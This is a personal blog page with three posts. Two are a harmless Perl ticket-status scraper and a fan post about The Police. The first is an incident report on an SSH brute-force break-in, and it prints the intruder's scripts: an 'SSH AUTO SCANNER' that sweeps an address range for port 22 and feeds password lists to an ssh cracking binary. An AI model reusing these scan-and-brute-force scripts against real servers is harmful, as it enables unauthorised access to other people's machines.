Parsed Participle

The personal weblog of Faiz Kazi: Mostly oddities in programming, life in Japan, occasionally music.

[ Home | RSS 2.0 | ATOM 1.0 ]

19 Nov 2007

Mon, 19 Nov 2007

Sod off, loathsome script-kiddie

Someone (or should I say, something, because this looks like some auto-scanning script) gained access via SSH using one of the unused user accounts on this server. Nothing very spectacular, especially since everything was easily visible with ps, and even who. the IP seems to be: 86.123.17.188.

I could see this when I ran who: 

faiz     pts/3        Nov 19 13:56 (p02a702.tokynt01.ap.so-net.ne.jp)
vasanth  pts/2        Nov 18 23:37 (86.123.17.188:S.0)

Looks like it never got beyond that, though I saw some hundreds of './ssh' processes running, which, after summarily killing off, I found and archived the offending scripts: These were stored and running off of the directory /var/tmp/vi.recover/irc/ as the user 'vasanth'. I suspect a weak password lead to a brute-force SSH break-in. Not at all a bother, but nothing that can't be fixed by an iptables '-m recent' filter.

Contents of the directory the intruder was running the scripts from: 
var/
`-- tmp
    `-- vi.recover
        `-- irc
            |-- 1
            |-- 10
            |-- 11
            |-- 12
            |-- 13
            |-- 14
            |-- 15
            |-- 16
            |-- 17
            |-- 18
            |-- 19
            |-- 2
            |-- 20
            |-- 209.85.ps.22
            |-- 21
            |-- 22
            |-- 23
            |-- 24
            |-- 25
            |-- 26
            |-- 27
            |-- 28
            |-- 29
            |-- 3
            |-- 30
            |-- 31
            |-- 32
            |-- 33
            |-- 34
            |-- 35
            |-- 36
            |-- 37
            |-- 38
            |-- 39
            |-- 4
            |-- 40
            |-- 41
            |-- 42
            |-- 43
            |-- 44
            |-- 45
            |-- 46
            |-- 47
            |-- 48
            |-- 49
            |-- 5
            |-- 50
            |-- 51
            |-- 52
            |-- 53
            |-- 54
            |-- 55
            |-- 56
            |-- 57
            |-- 58
            |-- 59
            |-- 6
            |-- 60
            |-- 61
            |-- 62
            |-- 63
            |-- 64
            |-- 7
            |-- 8
            |-- 9
            |-- all
            |-- common
            |-- full
            |-- go.sh
            |-- mfu.txt
            |-- pass_file
            |-- ps
            |-- r00t
            |-- skan
            |-- ss
            |-- ssh
            `-- x

Some samples from the scripts: Note: though no harm can come if you try running these binaries as a non-root user (if you are running Linux, that is), it's probably a good idea not to run the scripts in this archive - there's no easy way to be sure what they actually do. 

$ cat /var/tmp/vi.recover/irc/go.sh 
./ss 22 -b $1 -i eth0 -s 6
cat bios.txt |sort | uniq > mfu.txt
./ssh-scan
rm -f bios.txt


#!/bin/bash

clear

rm -rf $1.ps.$2

echo "#=====#==================================#=====#"
echo "#= R =# SSH AUTO SCANNER BY REGELE & CO  #= R =#"
echo "#= E =#-------   #BlackCat TEAM   -------#= E =#"
echo "#= G =#----------------------------------#= G =#"
echo "#= E =# � ALL RIGHTS RESERVED TO Regele �#= E =#"
echo "#= L =#   Now Just Sit Back End Relax    #= L =#"
echo "#= E =#   IPs founder... ACTIVATING!!!   #= E =#"
echo "#Range from -> $1.0.0"
echo "#Range   to -> $1.255.255"
echo "#Looking on -> PORT $2"

./ps $1 $2

sleep 5

cat $1.ps.$2 |sort |uniq > mfu.txt

oopsnr2=`grep -c . mfu.txt`

sleep 5
echo "#---Relax ... Take it Easy---#"

cat 1 > pass_file
sleep 3
./ssh 150

cat 2 > pass_file
sleep 3
./ssh 150

#... and so on

echo "# It's over, you cand go outside and play now #"
Yup, script 'kiddie' all right.

posted: 11:55 | path: /security | permanent link to this entry
comments: 3

Screen Scraping in this Day And Age

... of RSS, Web2.0 and whatnot. As much as I loved doing it back in old days, screen-scraping (parsing HTML off of web pages with a lot of guesswork) was (and is) yucky. I suppose I enjoyed it back then because I ended up learning a bit of Awk, and later Perl.

But since I've found no good way to avoid missing concerts, other than hope that there's a RSS feed with ticket/date information for bands/artists that I don't want to miss, I have to resort to such nonsense now and then: 

use LWP::Simple 'get';
use HTML::TableExtract;
use Data::Dumper;

sub STATUS { 5 }  # The 5th column of table happens to be 'ticket status'

my $te = new HTML::TableExtract;
# slurp!
$te->parse(get 'https://tickets.thepolice.com/');

my ($table) = $te->tables;             # The first and only table in the 
                                       # page is a list of all gigs by city,
                                       # date, and ticket availability
my @tokyo_gigs = grep {                
                    grep /Tokyo/, @$_  # Rows with dates in Tokyo
                 } $table->rows;

# Look out for any changes; at this time, there are only 2 shows in Tokyo
die "Whoa! no gigs in Tokyo??"    unless @tokyo_gigs;
die "Whoa! *more* gigs in Tokyo??"    if @tokyo_gigs > 2;
die "Whoa! only *one* gig in Tokyo??" if @tokyo_gigs == 1;

# ... and if their status is anything other than 'Coming Soon',
# then either tickets sales have begun, or... are already sold out!
print "Whoa! somethings up!\n", Dumper @tokyo_gigs 
    if grep { ! /coming soon/i  }
       map { $_->[STATUS] } @tokyo_gigs;

This is just so I don't miss The Police live at the Tokyo Dome, scheduled in February, 2008.

So having to screen-scrape may suck, but at least there's Perl.
UPDATE:Nov 21, 21:00 JST: Looks like it worked! Well, sort of. I put the script in my crontab and this morning it sent me a mail with "Whoa! no gigs in Tokyo??" in the body; and sure enough, it seems that the presale Tokyo tickets status had changed - a link that said "Buy Tickets" is in it's place.
(Of course, it's a totally different issue that the site in question does not seem to let one purchase tickets for the Tokyo venues - how lame! Well, at least I am early enough to buy the 'general public' tickets on time.)
posted: 07:58 | path: /programming | permanent link to this entry
Tags:
comments: 0

THE POLICE 2007 World Tour

I suppose one could call me a fan. After years of not listening to classic rock, leave aside The Police, I suddenly find myself buying all their classic albums. In fact, I just bought almost all of them. Amazon is evil, I tell you, with their accursed 'Customers who purchased this item also purchased...' feature:
  • Reggatta de Blanc
  • Ghost in the Machine
  • Zenyatta Mondatta
  • Synchronicity
Only Outlandos d'Amour is needed now, to complete a full collection of all the band's studio albums.

And, what timing: 2007 sees Sting, Andy Summers and Stewart Copeland not only reuniting as the original 3-piece band, but with any luck, I get to see them live in Tokyo in February. If I buy the tickets on time that is. I have a horrible track record of missing out any good live music in a city that's not exactly deprived of it.

I must be a fan; I've spent all weekend watching YouTube videos of The Police, both clips from their 2007 world tour and the old music videos from the early 80's.

I only hope they don't get completely bored of playing the sames songs over and over again, by the time they get here.

posted: 07:24 | path: /music | permanent link to this entry
comments: 1


Sections

< November 2007 >
SuMoTuWeThFrSa
     1 2 3
4 5 6 7 8 910
11121314151617
18192021222324
252627282930 

[ Home | RSS 2.0 | ATOM 1.0 ]